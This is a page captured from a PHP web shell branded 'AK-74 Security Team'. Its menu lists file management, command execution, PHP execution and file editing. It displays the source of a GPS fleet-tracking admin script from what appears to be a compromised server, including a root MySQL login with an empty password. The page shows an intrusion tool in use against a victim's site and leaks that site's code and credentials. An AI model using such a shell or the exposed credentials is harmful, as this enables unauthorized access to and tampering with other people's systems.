.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head dir="rtl"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" dir="rtl" /> <meta name="viewport" content="initial-scale=1.0, width=device-width, maximum-scale=1.0, user-scalable=no" /> <title>Engine</title> </head> <body> <form action="add_all_engine.php" method="post"> <!-- <B>iemi</B> --> <!-- <input type="text" name="iemi"></input>--> <input type="hidden" dir="rtl" lang="ar" name="name" value="المحرك"> </input> <input type="hidden" dir="rtl" lang="ar" name="text0" value="يعمل"> </input> <input type="hidden" dir="rtl" lang="ar" name="text1" value="لايعمل"> </input> <input type="hidden" name="teltonika" value="1"> <input type="submit" value="run_add-engine_concox"> </form> <form action="add_all_engine.php" method="post"> <!-- <B>iemi</B> --> <!-- <input type="text" name="iemi"></input>--> <input type="hidden" dir="rtl" lang="ar" name="name" value="المحرك"> </input> <input type="hidden" dir="rtl" lang="ar" name="text0" value="يعمل"> </input> <input type="hidden" dir="rtl" lang="ar" name="text1" value="لايعمل"> </input> <input type="hidden" name="teltonika" value="2"> <input type="submit" value="run_add-engine_Teltonika FM1100"> </form> <form action="add_all_engine.php" method="post"> <!-- <B>iemi</B> --> <!-- <input type="text" name="iemi"></input>--> <input type="hidden" dir="rtl" lang="ar" name="name" value="المحرك"> </input> <input type="hidden" dir="rtl" lang="ar" name="text0" value="يعمل"> </input> <input type="hidden" dir="rtl" lang="ar" name="text1" value="لايعمل"> </input> <input type="hidden" name="teltonika" value="3"> <input type="submit" value="run_add-engine_quicklinks"> </form> <form action="add_all_engine.php" method="post"> <!-- <B>iemi</B> --> <!-- <input type="text" name="iemi"></input>--> <input type="hidden" dir="rtl" lang="ar" name="name" value="المحرك"> </input> <input type="hidden" dir="rtl" lang="ar" name="text0" value="يعمل"> </input> <input type="hidden" dir="rtl" lang="ar" name="text1" value="لايعمل"> </input> <input type="hidden" name="teltonika" value="4"> <input type="submit" value="run_add-engine_megastek"> </form> <form action="add_all_engine.php" method="post"> <!-- <B>iemi</B> --> <!-- <input type="text" name="iemi"></input>--> <input type="hidden" dir="rtl" lang="ar" name="name" value="المحرك"> </input> <input type="hidden" dir="rtl" lang="ar" name="text0" value="يعمل"> </input> <input type="hidden" dir="rtl" lang="ar" name="text1" value="لايعمل"> </input> <input type="hidden" name="teltonika" value="5"> <input type="submit" value="run_add-engine_Ruptela"> </form> <!-- <br><h4 style="color:#F00;">ممنوع ادخل نفس الرقم مرتين</h4>--> <?php if (!empty($_POST['teltonika'])) { if ($_POST['teltonika'] == 1) { $con = mysqli_connect("localhost", "root","", "gs"); $str_query2 = "select imei FROM gs_objects WHERE protocol= 'concoxgt06' AND imei NOT IN( SELECT imei FROM gs_object_sensors )"; //$str_query2 = "select imei FROM gs_objects WHERE device= 'Concox GT06N'"; $con = mysqli_connect("localhost", "root","", "gs"); $result = mysqli_query($con, $str_query2); $row = mysqli_fetch_array($result); if (!empty($_POST['text0']) && $_POST['text1']) { while ($row = mysqli_fetch_array($result)) { $imei = $row['imei']; $name = mysqli_real_escape_string($con, $_POST['name']); $text0 = mysqli_real_escape_string($con, $_POST['text0']); $text1 = mysqli_real_escape_string($con, $_POST['text1']); $str_query = "INSERT INTO gs_object_sensors(imei,name,type,param,result_type,text_1,text_0,units,lv,hv,formula,calibration)VALUES('$imei','$name','acc','acc','logic','$text0','$text1','','0','0','','[]')"; // $str_query ="delete from gs_object_sensors where imei=$imei"; if (!mysqli_query($con, $str_query)) { die('Error1: ' . mysqli_error($con)); } echo "engine added for this $imei <br>"; } } } else if ($_POST['teltonika'] == 3) { $con = mysqli_connect("localhost", "root","", "gs"); $str_query2 = "select imei FROM gs_objects WHERE device= 'Queclink GV55/LITE' AND imei NOT IN(SELECT imei FROM gs_object_sensors)"; // $str_query2 = "select imei FROM gs_objects WHERE device= 'Queclink GV55/LITE'"; $result = mysqli_query($con, $str_query2); $row = mysqli_fetch_array($result); if (!empty($_POST['text0']) && $_POST['text1']) { while ($row = mysqli_fetch_array($result)) { $imei = $row['imei']; $name = mysqli_real_escape_string($con, $_POST['name']); $text0 = mysqli_real_escape_string($con, $_POST['text0']); $text1 = mysqli_real_escape_string($con, $_POST['text1']); $str_query = "INSERT INTO gs_object_sensors(imei,name,type,param,result_type,text_1,text_0,units,lv,hv,formula,calibration)VALUES('$imei','$name','acc','batp','logic','$text0','$text1','','0','0','','[]')"; // $str_query ="delete from gs_object_sensors where imei=$imei"; if (!mysqli_query($con, $str_query)) { die('Error1: ' . mysqli_error($con)); } echo "engine added for this $imei <br>"; } } } else if ($_POST['teltonika'] == 4) { $con = mysqli_connect("localhost", "root","", "gs"); $str_query2 = "select imei FROM gs_objects WHERE device= 'Megastek XT-007' AND imei NOT IN(SELECT imei FROM gs_object_sensors)"; // $str_query2 = "select imei FROM gs_objects WHERE device= 'Queclink GV55/LITE'"; $result = mysqli_query($con, $str_query2); $row = mysqli_fetch_array($result); if (!empty($_POST['text0']) && $_POST['text1']) { while ($row = mysqli_fetch_array($result)) { $imei = $row['imei']; $name = mysqli_real_escape_string($con, $_POST['name']); $text0 = mysqli_real_escape_string($con, $_POST['text0']); $text1 = mysqli_real_escape_string($con, $_POST['text1']); $str_query = "INSERT INTO gs_object_sensors(imei,name,type,param,result_type,text_1,text_0,units,lv,hv,formula,calibration)VALUES('$imei','$name','acc','batp','logic','$text0','$text1','','0','0','','[]')"; // $str_query ="delete from gs_object_sensors where imei=$imei"; if (!mysqli_query($con, $str_query)) { die('Error1: ' . mysqli_error($con)); } echo "engine added for this $imei <br>"; } } } else if ($_POST['teltonika'] == 5) { $con = mysqli_connect("localhost", "root","", "gs"); $str_query2 = "select imei FROM gs_objects WHERE protocol= 'ruptela' AND imei NOT IN(SELECT imei FROM gs_object_sensors)"; // $str_query2 = "select imei FROM gs_objects WHERE device= 'Ruptela FM-Eco4'"; $result = mysqli_query($con, $str_query2); $row = mysqli_fetch_array($result); if (!empty($_POST['text0']) && $_POST['text1']) { while ($row = mysqli_fetch_array($result)) { $imei = $row['imei']; $name = mysqli_real_escape_string($con, $_POST['name']); $text0 = mysqli_real_escape_string($con, $_POST['text0']); $text1 = mysqli_real_escape_string($con, $_POST['text1']); $str_query = "INSERT INTO gs_object_sensors(imei,name,type,param,result_type,text_1,text_0,units,lv,hv,formula,calibration)VALUES('$imei','$name','di','di4','logic','$text0','$text1','','0','0','','[]')"; // $str_query ="delete from gs_object_sensors where imei=$imei"; if (!mysqli_query($con, $str_query)) { die('Error1: ' . mysqli_error($con)); } echo "engine added for this $imei <br>"; } } } else if ($_POST['teltonika'] == 2) { $con = mysqli_connect("localhost", "root","", "gs"); $str_query2 = "select imei FROM gs_objects WHERE protocol= 'teltonikafm' AND imei NOT IN( SELECT imei FROM gs_object_sensors )"; $result = mysqli_query($con, $str_query2); $row = mysqli_fetch_array($result); if (!empty($_POST['text0']) && $_POST['text1']) { while ($row = mysqli_fetch_array($result)) { $imei = $row['imei']; $name = mysqli_real_escape_string($con, $_POST['name']); $text0 = mysqli_real_escape_string($con, $_POST['text0']); $text1 = mysqli_real_escape_string($con, $_POST['text1']); $str_query = "INSERT INTO gs_object_sensors(imei,name,type,param,result_type,text_1,text_0,units,lv,hv,formula,calibration)VALUES('$imei','$name','di','di1','logic','$text0','$text1','','0','0','','[]')"; if (!mysqli_query($con, $str_query)) { die('Error1: ' . mysqli_error($con)); } echo "engine added for this $imei <br>"; } } } } ?> </body> </html>
Rename:
-